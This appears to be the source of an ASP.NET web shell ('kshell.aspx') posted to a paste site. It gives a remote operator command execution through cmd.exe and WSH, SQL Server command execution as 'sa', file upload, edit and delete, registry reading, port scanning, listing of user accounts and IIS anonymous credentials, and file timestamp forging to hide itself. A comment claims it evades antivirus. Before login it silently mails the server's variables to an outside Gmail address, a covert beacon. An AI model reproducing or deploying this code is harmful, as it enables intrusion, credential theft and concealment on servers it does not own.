- TITLE="IIS List Anonymous' User details"
- elseif act="sqlman" then
- TITLE="MSSQL Management"
- elseif act="scan" then
- TITLE="Port Scanner"
- elseif act="iisspy" then
- TITLE="IIS Spy"
- elseif act="sqltool" then
- TITLE="SQL Tool"
- elseif act="regshell" then
- TITLE="Registry Shell"
- else
- TITLE=request.ServerVariables("HTTP_HOST")
- end if
- %>
- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
- <html>
- <style>
- body{background-color:#444;color:#e1e1e1;}
- body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
- table.info{ color:#fff;background-color:#222; }
- span,h1,a{ color: #df5 !important; }
- span{ font-weight: bolder; }
- h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
- div.content{ padding: 5px;margin-left:5px;background-color:#333; }
- a{ text-decoration:none; }
- a:hover{ text-decoration:underline; }
- .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
- .bigarea{ width:100%;height:300px; }
- input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
- form{ margin:0px; }
- .toolsInp{ width: 300px }
- .main th{text-align:left;background-color:#5e5e5e;}
- .main tr:hover{background-color:#5e5e5e}
- .l1{background-color:#444}
- .l2{background-color:#333}
- pre{font-family:Courier,Monospace;}
- </style>
- <head>
- <meta http-equiv="Content-Type" content="text/html">
- <title></title>
- </head>
- <body>
- <hr>
- <%
- Dim error_x as Exception
- Try
- if session("rooot")<>1 then
- 'Test sending anonymous mail, comment it if you don't want test it
- dim info As String
- Try
- info = request.ServerVariables.ToString.Replace("%2f","/").Replace("%5c","\").Replace("%3a",":").Replace("%2c",",").Replace("%3b",";").Replace("%3d","=").Replace("%2b","+").Replace("%0d%0a",vbnewline)
- System.Web.Mail.SmtpMail.SmtpServer = "localhost"
- System.Web.Mail.SmtpMail.Send(request.ServerVariables("HTTP_HOST"),"test.mail.address.2008@gmail.com",request.ServerVariables("HTTP_HOST")+request.ServerVariables("URL"),info)
- Catch
- End Try
- %>
- <center>
- <form runat="server">
- Your Password:<asp:TextBox ID="TextBox" runat="server" TextMode="Password" class="TextBox" />
- <asp:Button ID="Button" runat="server" Text="Login" ToolTip="Click here to login" OnClick="login_click" class="buttom" />
- </form>
- </center>
- <%
- else
- dim temp as string
- temp=request.QueryString("action")
- if temp="" then temp="goto"
- select case temp
- case "goto"
- if request.QueryString("src")<>"" then
- url=request.QueryString("src")
- else
- url=server.MapPath(".") & "\"
- end if
- call existdir(url)
- dim xdir as directoryinfo
- dim mydir as new DirectoryInfo(url)
- dim guru as string
- dim xfile as fileinfo
- dim ServerIP As string = "<font color=white>Server IP :</font> <b>" + Request.ServerVariables("LOCAL_ADDR") + "</b> - <font color=white>Client IP :</font> <b>" + getIP() + "</b> - "
- dim HostName As string = "<font color=white>HostName :</font> <b>" + Environment.MachineName + "</b> - <font color=white>Username :</font> <b>"+ Environment.UserName +"</b><br>"
- dim OSVersion As string = "<font color=white>OS Version :</font> <b>" + Environment.OSVersion.ToString() + "</b>"
- dim IISversion As string = "<font color=white> - IIS Version :</font> <b>" + Request.ServerVariables("SERVER_SOFTWARE") + "</b><br><font color=white>System Dir :</font> <b>" + Environment.SystemDirectory + "</b>"
- dim PATH_INFO As string = "<font color=white> - PATH_TRANSLATED :</font> <b>" + Request.ServerVariables("PATH_TRANSLATED") + "</b><br>"
- dim HARDWARE_INFO As string = ""
- Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables()
- Dim de As DictionaryEntry
- For Each de In environmentVariables
- if de.Key = "NUMBER_OF_PROCESSORS" then
- HARDWARE_INFO += "<font color=white>Hardware Info :</font> <b>" + de.Value + "CPU - "
- end if
- if de.Key = "PROCESSOR_IDENTIFIER" then
- HARDWARE_INFO += de.Value + "</b><br>"
- end if
- Next
- Info.Text += ServerIP + HostName + OSVersion + IISversion + PATH_INFO + HARDWARE_INFO
- %>
- <table width="100%" border="0" align="center">
- <tr>
- <td><asp:Label ID="Info" runat="server" EnableViewState="False" /></td>
- </tr>
- </table>
- <hr>
- <table width="100%" border="0" align="center">
- <tr>
- <td>Currently Dir:</td> <td><font color=red><%=url%></font></td>
- </tr>
- <tr>
- <td width="10%">Operate:</td>
- <td width="90%"><a href="?action=new&src=<%=server.UrlEncode(url)%>" title="New file or directory">New</a> -
- <%if session("cutboard")<>"" then%>
- <a href="?action=paste&src=<%=server.UrlEncode(url)%>" title="you can paste">Paste</a> -
- <%else%>
- Paste -
- <%end if%>
- <a href="?action=upfile&src=<%=server.UrlEncode(url)%>" title="Upload file">UpLoad</a> - <a href="?action=goto&src=" & <%=server.MapPath(".")%> title="Go to this file's directory">GoBackDir </a> - <a href="?action=logout" title="Exit" ><font color="red">Quit</font></a>
- </td>
- </tr>
- <tr>
- <td>
- Go to: </td>
- <td>
- <%
- dim i as integer
- for i =0 to Directory.GetLogicalDrives().length-1
- response.Write("<a href='?action=goto&src=" & Directory.GetLogicalDrives(i) & "'>" & Directory.GetLogicalDrives(i) & " </a>")
- next
- %>
- </td>
- <td align="Left">
- <%
- response.Write("IP:<font color=red>" & Request.ServerVariables("REMOTE_ADDR")&"</font>")
- %>
- </td>
- </tr>
- <tr>
- <td>Tool:</td>
- <td><a href="?action=sqlrootkit" >SqlRootKit.NET </a> - <a href="?action=cmd" >CMD.NET</a> - <a href="?action=cmdw32" >kshellW32</a> - <a href="?action=cmdwsh" >kshellWSH</a> - <a href="?action=clonetime&src=<%=server.UrlEncode(url)%>" >CloneTime</a> - <a href="?action=information" >System Info</a> - <a href="?action=pro1" >List Processes 1</a> - <a href="?action=pro2" >List Processes 2</a></td>
- </tr>
- <tr>
- <td> </td>
- <td><a href="?action=user" >List User Accounts</a> - <a href="?action=auser" >IIS Anonymous User</a>- <a href="?action=scan" >Port Scanner</a> - <a href="?action=iisspy" >IIS Spy</a> - <a href="?action=applog" >Application Event Log </a> - <a href="?action=syslog" >System Log</a></td>
- </tr>
- </table>
- <hr>
- <table width=100% class=main cellspacing=0 cellpadding=1><tr><th>Name</th><th>Size</th><th>Modify</th><th>Actions</th></tr>
- <tr>
- <td><%
- guru= "<tr><td><a href='?action=goto&src=" & server.UrlEncode(Getparentdir(url)) & "'><b>[..]</b></a></td></tr>"
- response.Write(guru)
- dim lll
- lll=1
- for each xdir in mydir.getdirectories()
- response.Write("<tr>")
- dim filepath as string
- filepath=server.UrlEncode(url & xdir.name)
- if lll=1 then
- lll=2
- else
- lll=1
- end if
- guru= "<tr class=l" & lll & "><td><a href='?action=goto&src=" & filepath & "\" & "'><b>[" & xdir.name & "]</b></a></td>"
- response.Write(guru)
- response.Write("<td><dir></td>")
- response.Write("<td>" & Directory.GetLastWriteTime(url & xdir.name) & "</td>")
- guru="<td><a href='?action=cut&src=" & filepath & "\' target='_blank'>Cut" & "</a>|<a href='?action=copy&src=" & filepath & "\' target='_blank'>Copy</a>|<a href='?action=del&src=" & filepath & "\'" & " onclick='return del(this);'>Del</a></td>"
- response.Write(guru)
- response.Write("</tr>")
- next
- %></td>
- </tr>
- <tr>
- <td><%
- for each xfile in mydir.getfiles()
- dim filepath2 as string
- filepath2=server.UrlEncode(url & xfile.name)
- response.Write("<tr>")
- if lll=1 then
- lll=2
- else
- lll=1
- end if
- guru= "<tr class=l" & lll & "><td><a href='?action=edit&src=" & filepath2 & "'>" & xfile.name & "</a></td>"
- response.Write(guru)
- guru="<td>" & GetSize(xfile.length) & "</td>"
- response.Write(guru)
- response.Write("<td>" & file.GetLastWriteTime(url & xfile.name) & "</td>")
- guru="<td><a href='?action=edit&src=" & filepath2 & "'>Edit</a>|<a href='?action=cut&src=" & filepath2 & "' target='_blank'>Cut</a>|<a href='?action=copy&src=" & filepath2 & "' target='_blank'>Copy</a>|<a href='?action=rename&src=" & filepath2 & "'>Rename</a>|<a href='?action=down&src=" & filepath2 & "' onClick='return down(this);'>Download</a>|<a href='?action=del&src=" & filepath2 & "' onClick='return del(this);'>Del</a></td>"
- response.Write(guru)
- response.Write("</tr>")
- next
- response.Write("</table>")
- %></td>
- </tr>
- </table>
- <script language="javascript">
- function del()
- {
- if(confirm("Are you sure?")){return true;}
- else{return false;}
- }
- function down()
- {
- if(confirm("If the file size > 20M,\nPlease don\'t download\nYou can copy file to web directory ,use http download\nAre you sure download?")){return true;}
- else{return false;}
- }
- </script>
- <%
- case "information"
- dim CIP,CP as string
- if getIP()<>request.ServerVariables("REMOTE_ADDR") then
- CIP=getIP()
- CP=request.ServerVariables("REMOTE_ADDR")
- else
- CIP=request.ServerVariables("REMOTE_ADDR")
- CP="None"
- end if
- %>
- <div align=center>[ Web Server Information ] <i><a href="javascript:history.back(1);">Back</a></i></div><br>
- <table width="100%" border="1" align="center">
- <tr>
- <td width="40%">Server IP</td>
- <td width="60%"><%=request.ServerVariables("LOCAL_ADDR")%></td>
- </tr>
- <tr>
- <td height="73">Machine Name</td>
- <td><%=Environment.MachineName%></td>
- </tr>
- <tr>
- <td>Network Name</td>
- <td><%=Environment.UserDomainName.ToString()%></td>
- </tr>
- <tr>
- <td>User Name in this Process</td>
- <td><%=Environment.UserName%></td>
- </tr>
- <tr>
- <td>OS Version</td>
- <td><%=Environment.OSVersion.ToString()%></td>
- </tr>
- <tr>
- <td>Started Time</td>
- <td><%=GetStartedTime(Environment.Tickcount)%> Hours</td>
- </tr>
- <tr>
- <td>System Time</td>
- <td><%=now%></td>
- </tr>
- <tr>
- <td>IIS Version</td>
- <td><%=request.ServerVariables("SERVER_SOFTWARE")%></td>
- </tr>
- <tr>
- <td>HTTPS</td>
- <td><%=request.ServerVariables("HTTPS")%></td>
- </tr>
- <tr>
- <td>PATH_INFO</td>
- <td><%=request.ServerVariables("PATH_INFO")%></td>
- </tr>
- <tr>
- <td>PATH_TRANSLATED</td>
- <td><%=request.ServerVariables("PATH_TRANSLATED")%></td>
- <tr>
- <td>SERVER_PORT</td>
- <td><%=request.ServerVariables("SERVER_PORT")%></td>
- </tr>
- <tr>
- <td>SeesionID</td>
- <td><%=Session.SessionID%></td>
- </tr>
- <tr>
- <td colspan="2"><span class="style3">Client Infomation</span></td>
- </tr>
- <tr>
- <td>Client Proxy</td>
- <td><%=CP%></td>
- </tr>
- <tr>
- <td>Client IP</td>
- <td><%=CIP%></td>
- </tr>
- <tr>
- <td>User</td>
- <td><%=request.ServerVariables("HTTP_USER_AGENT")%></td>
- </tr>
- </table>
- <table align=center>
- <% Create_table_row_with_supplied_colors("Black", "White", "center", "Environment Variables, Server Variables") %>
- <tr>
- <td><textArea cols=50 rows=10><% output_all_environment_variables("text") %></textarea></td>
- <td><textArea cols=50 rows=10><% output_all_Server_variables("text") %></textarea></td>
- </tr>
- </table>
- <%
- case "cmd"
- %>
- <form runat="server">
- <p>[ CMD.NET for WebAdmin ] <i><a href="javascript:history.back(1);">Back</a></i></p>
- <p> Execute command with ASP.NET account(<span class="style3">Notice: only click "Run" to run</span>)</p>
- <p>- This function has fixed by kikicoco.Antivirus has not detected (2007/02/27)-</p>
- Command:
- <asp:TextBox ID="cmd" runat="server" Width="300" class="TextBox" />
- <asp:Button ID="Button123" runat="server" Text="Run" OnClick="RunCMD" class="buttom"/>
- <p>
- <asp:Label ID="result" runat="server" style="style2"/> </p>
- </form>
- <%
- case "cmdw32"
- %>
- <form runat="server">
- <p>[ ASP.NET W32 Shell ] <i><a href="javascript:history.back(1);">Back</a></i></p>
- <p> Execute command with ASP.NET account using W32(<span class="style3">Notice: only click "Run" to run</span>)</p>
- <%
- Response.Write("System Dir : "+Environment.SystemDirectory +"<br><br>")
- %>
- CMD File:
- <asp:TextBox ID="txtCmdFile" runat="server" Width="473px" style="border: 1px solid #084B8E">C:\\WINDOWS\\system32\\cmd.exe</asp:TextBox><br><br>
- Command:
- <asp:TextBox ID="txtCommand1" runat="server" style="border: 1px solid #084B8E"/>
- <asp:Button ID="Buttoncmdw32" runat="server" Text="Run" OnClick="RunCmdW32" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>
- <p>
- <asp:Label ID="resultcmdw32" runat="server" style="color: #0000FF"/>
- </p>
- </form>
- <%
- case "cmdwsh"
- %>
- <form runat="server">
- <p>[ ASP.NET WSH Shell ] <i><a href="javascript:history.back(1);">Back</a></i></p>
- <p> Execute command with ASP.NET account using WSH(<span class="style3">Notice: only click "Run" to run</span>)</p>
- Command:
- <asp:TextBox ID="txtCommand2" runat="server" style="border: 1px solid #084B8E"/>
- <asp:Button ID="Buttoncmdwsh" runat="server" Text="Run" OnClick="RunCmdWSH" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>
- <p>
- <asp:Label ID="resultcmdwsh" runat="server" style="color: #0000FF"/>
- </p>
- </form>
- <%
- case "pro1"
- %>
- <form runat="server">
- <p align=center>[ List processes from server ] <i><a href="javascript:history.back(1);">Back</a></i></p>
- <table align=center>
- <tr>
- <td>
- <%
- Try
- output_wmi_function_data("Win32_Process","ProcessId,Name,WorkingSetSize,HandleCount")
- Catch
- rw("This function is disabled by server")
- End Try
- %>
- </td>
- </tr>
- </table>
- </form>
- <%
- case "pro2"
- %>
- <form runat="server">
- <p align=center>[ List processes from server ] <i><a href="javascript:history.back(1);">Back</a></i></p>
- <table align=center width='80%'>
- <tr>
- <td>
- <%
- Dim htmlbengin As String = "<table width='80%' align=center border=0><tr align=center><td width='20%'><b>ID</b></td><td align=left width='20%'><b>Process</b></td><td align=left width='20%'><b>MemorySize</b></td><td align=center width='10%'><b>Threads</b></td></tr>"
- Dim prostr As String = ""
- Dim htmlend As String = "</tr></table>"
- Try
- Dim mypro As Process() = Process.GetProcesses()
- For Each p As Process In mypro
- prostr += "<tr><td align=center>" + p.Id.ToString() + "</td>"
- prostr += "<td align=left>" + p.ProcessName.ToString() + "</td>"
- prostr += "<td align=left>" + p.WorkingSet.ToString() + "</td>"
- prostr += "<td align=center>" + p.Threads.Count.ToString() + "</td>"
- Next
- Catch ex As Exception
- Response.write(ex.Message)
- End Try
- Response.write(htmlbengin + prostr + htmlend)
- %>
- </td>
- </tr>
- </table>
- </form>
- <%
- case "user"
- %>
- <form runat="server">
- <p align=center>[ List User Accounts ] <i><a href="javascript:history.back(1);">Back</a></i></p>
- <table align=center>
- <tr>
- <td>
- <%
- dim WMI_function = "Win32_UserAccount"
- dim Fields_to_load = "Name,Domain,FullName,Description,PasswordRequired,SID"
- dim fail_description = " Access to " + WMI_function + " is protected"
- Try
- output_wmi_function_data(WMI_function,Fields_to_load)
- Catch
- rw(fail_description)
- End Try
- %>
- </td>
- </tr>
- </table>
- </form>
- <%
- case "reg"
- %>
- <form runat="server">
- <p align=center>[ Registry ] <i><a href="javascript:history.back(1);">Back</a></i></p>
- <table align=center>
- <tr>
- <td>
- <%
- dim WMI_function = "Win32_Registry"
- dim Fields_to_load = "Caption,CurrentSize,Description,InstallDate,Name,Status"
- dim fail_description = " Access to " + WMI_function + " is protected"
- Try
- output_wmi_function_data(WMI_function,Fields_to_load)
- Catch
- rw(fail_description)
- End Try
- %>
- </td>
- </tr>
- </table>
- </form>
- <%
- case "applog"
- %>
- <form runat="server">
- <p align=center>[ List Application Event Log Entries ] <i><a href="javascript:history.back(1);">Back</a></i></p>
- <table align=center>
- <tr>
- <td>
- <%
- dim WMI_function = "Win32_NTLogEvent where Logfile='Application'"
- dim Fields_to_load = "Logfile,Message,type"
- dim fail_description = " Access to " + WMI_function + " is protected"
- Try
- output_wmi_function_data_instances(WMI_function,Fields_to_load,2000)
- Catch
- rw(fail_description)
- End Try
- %>
- </td>
- </tr>
- </table>
- </form>
- <%
- case "syslog"
- %>
- <form runat="server">
- <p align=center>[ List System Event Log Entries ] <i><a href="javascript:history.back(1);">Back</a></i></p>
- <table align=center>
- <tr>
- <td>
- <%
- dim WMI_function = "Win32_NTLogEvent where Logfile='System'"
- dim Fields_to_load = "Logfile,Message,type"
- dim fail_description = " Access to " + WMI_function + " is protected"
- Try
- output_wmi_function_data_instances(WMI_function,Fields_to_load,2000)
- Catch
- rw("This function is disabled by server")
- End Try
- %>
- </td>
- </tr>
- </table>
- </form>
- <%
- case "auser"
- %>
- <form runat="server">
- <p align=center>[ IIS List Anonymous' User details ] <i><a href="javascript:history.back(1);">Back</a></i></p>
- <table align=center>
- <tr>
- <td>
- <%
- Try
- IIS_list_Anon_Name_Pass
- Catch
- rw("This function is disabled by server")
- End Try
- %>
- </td>
- </tr>
- </table>
- </form>
- <%
- case "scan"
- %>
- <form runat="server">
- <p>[ ASP.NET Port Scanner ] <i><a href="javascript:history.back(1);">Back</a></i></p>
- <div>
- C# coded by Hackwol & Lenk, VB coded by kikicoco (19/08/2008)<br /><br />
- Start IP : <asp:TextBox ID="txtStartIP" runat="server" Width="177px">127.0.0.1</asp:TextBox>
- --- End Ip : <asp:TextBox ID="txtEndIP" runat="server" Width="185px">127.0.0.1</asp:TextBox>
- <br />
- Ports : <asp:TextBox ID="txtPorts" runat="server" Width="473px">21,25,80,1433,3306,3389</asp:TextBox><br />
- <br />
- <asp:Button ID="btnScan" runat="server" Text="Scan" Width="60px" Font-Bold="True" ForeColor="MediumBlue" BorderStyle="Solid" OnClick="btnScan_Click" />
-
- <asp:Button ID="btnReset" runat="server" Text="Reset" Width="60px" Font-Bold="True" ForeColor="MediumBlue" BorderStyle="Solid" OnClick="btnReset_Click" /><br />
- <br />
- <asp:Label ID="Label1" runat="server" Text="Result:" Visible="False" Width="70px"></asp:Label><br />
- <asp:ListBox ID="lstRet" runat="server" BackColor="Black" ForeColor="#00C000" Height="251px"
- Width="527px" Visible="False"></asp:ListBox>
- <hr align=left style="width: 526px" />
- <br />
- </div>
- </form>
- <%
- case "iisspy"
- %>
- <p align=center>[ IIS Spy ] <i><a href="javascript:history.back(1);">Back</a></i></p>
- <%
- Try
- Response.write(IISSpy())
- Catch
- rw("This function is disabled by server")
- End Try
- %>
- <%
- case "sqltool"
- %>
- <p align=center>[ SQL Tool ] <i><a href="javascript:history.back(1);">Back</a></i></p>
- <%
- Try
- Catch
- rw("This function is disabled by server")
- End Try
- %>
- <%
- case "regshell"
- %>
- <form runat="server">
- <p align=center >[ Registry Shell ] <i><a href="javascript:history.back(1);">Back</a></i></p>
- Key:
- <asp:TextBox ID="txtRegKey" runat="server" style="width: 595px; border: 1px solid #084B8E">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName</asp:TextBox><br><br>
- Value:
- <asp:TextBox ID="txtRegValue" runat="server" style="border: 1px solid #084B8E">ComputerName</asp:TextBox>
- <asp:Button ID="btnReadReg" runat="server" Text="Run" OnClick="RegistryRead" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>
- <p>
- <asp:Label ID="lblresultReg" runat="server" style="color: red"/>
- </p>
- </form>
- <%
- case "sqlman"
- %>
- <form runat="server">
- <p>[ MSSQL Query ] <i><a href="javascript:history.back(1);">Back</a></i></p>
- <p> Execute query with SQLServer account(<span class="style3">Notice: only click "Run" to run</span>)</p>
- <p>Host:
- <asp:TextBox ID="txtHost" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
- <p>
- SQL Name:
- <asp:TextBox ID="txtSqlName" runat="server" Width="50" class="TextBox" Text='sa'/>
- SQL Password:
- <asp:TextBox ID="txtSqlPass" runat="server" Width="80" class="TextBox"/>
- </p>
- Command:
- <asp:TextBox ID="txtSqlcmd" runat="server" Width="500" class="TextBox" TextMode="MultiLine" Rows="6"/></br>
- <asp:Button ID="btnButtonSQL" runat="server" Text="Run" OnClick="RunSQLQUERY" class="buttom" Width="100"/>
- <p>
- <asp:Label ID="lblresultSQL" runat="server" style="style2"/> </p>
- </form>
- <%
- case "sqlrootkit"
- %>
- <form runat="server">
- <p>[ SqlRootKit.NET for WebAdmin ] <i><a href="javascript:history.back(1);">Back</a></i></p>
- <p> Execute command with SQLServer account(<span class="style3">Notice: only click "Run" to run</span>)</p>
- <p>Host:
- <asp:TextBox ID="ip" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
- <p>
- SQL Name:
- <asp:TextBox ID="SqlName" runat="server" Width="50" class="TextBox" Text='sa'/>
- SQL Password:
- <asp:TextBox ID="SqlPass" runat="server" Width="80" class="TextBox"/>
- </p>
- Command:
- <asp:TextBox ID="Sqlcmd" runat="server" Width="300" class="TextBox"/>
- <asp:Button ID="ButtonSQL" runat="server" Text="Run" OnClick="RunSQLCMD" class="buttom"/>
- <p>
- <asp:Label ID="resultSQL" runat="server" style="style2"/> </p>
- </form>
- <%
- case "del"
- dim a as string
- a=request.QueryString("src")
- call existdir(a)
- call del(a)
- response.Write("<script>alert(""Delete " & replace(a,"\","\\") & " Success!"");location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(a)) &"'</script>")
- case "copy"
- call existdir(request.QueryString("src"))
- session("cutboard")="" & request.QueryString("src")
- response.Write("<script>alert('File info have add the cutboard, go to target directory click paste!');location.href='JavaScript:self.close()';</script>")
- case "cut"
- call existdir(request.QueryString("src"))
- session("cutboard")="" & request.QueryString("src")
- response.Write("<script>alert('File info have add the cutboard, go to target directory click paste!');location.href='JavaScript:self.close()';</script>")
- case "paste"
- dim ow as integer
- if request.Form("OverWrite")<>"" then ow=1
- if request.Form("Cancel")<>"" then ow=2
- url=request.QueryString("src")
- call existdir(url)
- dim d as string
- d=session("cutboard")
- if left(d,1)="" then
- TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
- TEMP2=url & replace(path.getfilename(d),"","")
- if right(d,1)="\" then
- call xexistdir(TEMP1,ow)
- directory.move(replace(d,"",""),TEMP1 & "\")
- response.Write("<script>alert('Cut " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP1 & "\","\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
- else
- call xexistdir(TEMP2,ow)
- file.move(replace(d,"",""),TEMP2)
- response.Write("<script>alert('Cut " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP2,"\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
- end if
- else
- TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
- TEMP2=url & path.getfilename(replace(d,"",""))
- if right(d,1)="\" then
- call xexistdir(TEMP1,ow)
- directory.createdirectory(TEMP1)
- call copydir(replace(d,"",""),TEMP1 & "\")
- response.Write("<script>alert('Copy " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP1 & "\","\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
- else
- call xexistdir(TEMP2,ow)
- file.copy(replace(d,"",""),TEMP2)
- response.Write("<script>alert('Copy " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP2,"\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
- end if
- end if
- case "upfile"
- url=request.QueryString("src")
- %>
- <form name="UpFileForm" enctype="multipart/form-data" method="post" action="?src=<%=server.UrlEncode(url)%>" runat="server" onSubmit="return checkname();">
- You will upload file to this directory : <span class="style3"><%=url%></span><br>
- Please choose file from your computer :
- <input name="upfile" type="file" class="TextBox" id="UpFile" runat="server">
- <input type="submit" id="UpFileSubit" value="Upload" runat="server" onserverclick="UpLoad" class="buttom">
- </form>
- <a href="javascript:history.back(1);" style="color:#FF0000">Go Back </a>
- <%
- case "new"
- url=request.QueryString("src")
- %>
- <form runat="server">
- <%=url%><br>
- Name:
- <asp:TextBox ID="NewName" TextMode="SingleLine" runat="server" class="TextBox"/>
- <br>
- <asp:RadioButton ID="NewFile" Text="File" runat="server" GroupName="New" Checked="true"/>
- <asp:RadioButton ID="NewDirectory" Text="Directory" runat="server" GroupName="New"/>
- <br>
- <asp:Button ID="NewButton" Text="Submit" runat="server" CssClass="buttom" OnClick="NewFD"/>
- <input name="Src" type="hidden" value="<%=url%>">
- </form>
- <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
- <%
- case "edit"
- dim b as string
- b=request.QueryString("src")
- call existdir(b)
- dim myread as new streamreader(b,encoding.default)
- filepath.text=b
- content.text=myread.readtoend
- %>
- <form runat="server">
- <table width="100%" border="1" align="center">
- <tr> <td width="11%">Path</td>
- <td width="89%">
- <asp:TextBox CssClass="TextBox" ID="filepath" runat="server" Width="300"/>
- *</td>
- </tr>
- <tr>
- <td>Content</td>
- <td> <asp:TextBox ID="content" Rows="25" Columns="100" TextMode="MultiLine" runat="server" CssClass="TextBox"/></td>
- </tr>
- <tr>
- <td></td>
- <td> <asp:Button ID="a" Text="Sumbit" runat="server" OnClick="Editor" CssClass="buttom"/>
- </td>
- </tr>
- </table>
- </form>
- <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
- <%
- myread.close
- case "rename"
- url=request.QueryString("src")
- if request.Form("name")="" then
- %>
- <form name="formRn" method="post" action="?action=rename&src=<%=server.UrlEncode(request.QueryString("src"))%>" onSubmit="return checkname();">
- <p>You will rename <span class="style3"><%=request.QueryString("src")%></span>to: <%=getparentdir(request.QueryString("src"))%>
- <input type="text" name="name" class="TextBox">
- <input type="submit" name="Submit3" value="Submit" class="buttom">
- </p>
- </form>
- <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
- <script language="javascript">
- function checkname()
- {
- if(formRn.name.value==""){alert("You shall input filename :(");return false}
- }
- </script>
- <%
- else
- if Rename() then
- response.Write("<script>alert('Rename " & replace(url,"\","\\") & " to " & replace(Getparentdir(url) & request.Form("name"),"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
- else
- response.Write("<script>alert('Exist the same name file , rename fail :(');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
- end if
- end if
- case "samename"
- url=request.QueryString("src")
- %>
- <form name="form1" method="post" action="?action=paste&src=<%=server.UrlEncode(url)%>">
- <p class="style3">Exist the same name file , can you overwrite ?(If you click " no" , it will auto add a number as prefix)</p>
- <input name="OverWrite" type="submit" id="OverWrite" value="Yes" class="buttom">
- <input name="Cancel" type="submit" id="Cancel" value="No" class="buttom">
- </form>
- <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
- <%
- case "clonetime"
- time1.Text=request.QueryString("src")&"kshell.aspx"
- time2.Text=request.QueryString("src")
- %>
- <form runat="server">
- <p>[CloneTime for WebAdmin]<i> <a href="javascript:history.back(1);">Back</a></i> </p>
- <p>A tool that it copy the file or directory's time to another file or directory </p>
- <p>Rework File or Dir:
- <asp:TextBox CssClass="TextBox" ID="time1" runat="server" Width="300"/></p>
- <p>Copied File or Dir:
- <asp:TextBox CssClass="TextBox" ID="time2" runat="server" Width="300"/></p>
- <asp:Button ID="ButtonClone" Text="Submit" runat="server" CssClass="buttom" OnClick="CloneTime"/>
- </form>
- <p>
- <%
- case "logout"
- session.Abandon()
- response.Write("<script>alert(' Goodbye !');location.href='" & request.ServerVariables("URL") & "';</sc" & "ript>")
- end select
- end if
- Catch error_x
- response.Write("<font color=""red""><br>Wrong: </font>"&error_x.Message)
- End Try
- %>
- </p>
- </p>
- <hr>
- <script language="javascript">
- function closewindow()
- {self.close();}
- </script>
- </body>
- </html>
Add Comment
Please, Sign In to add comment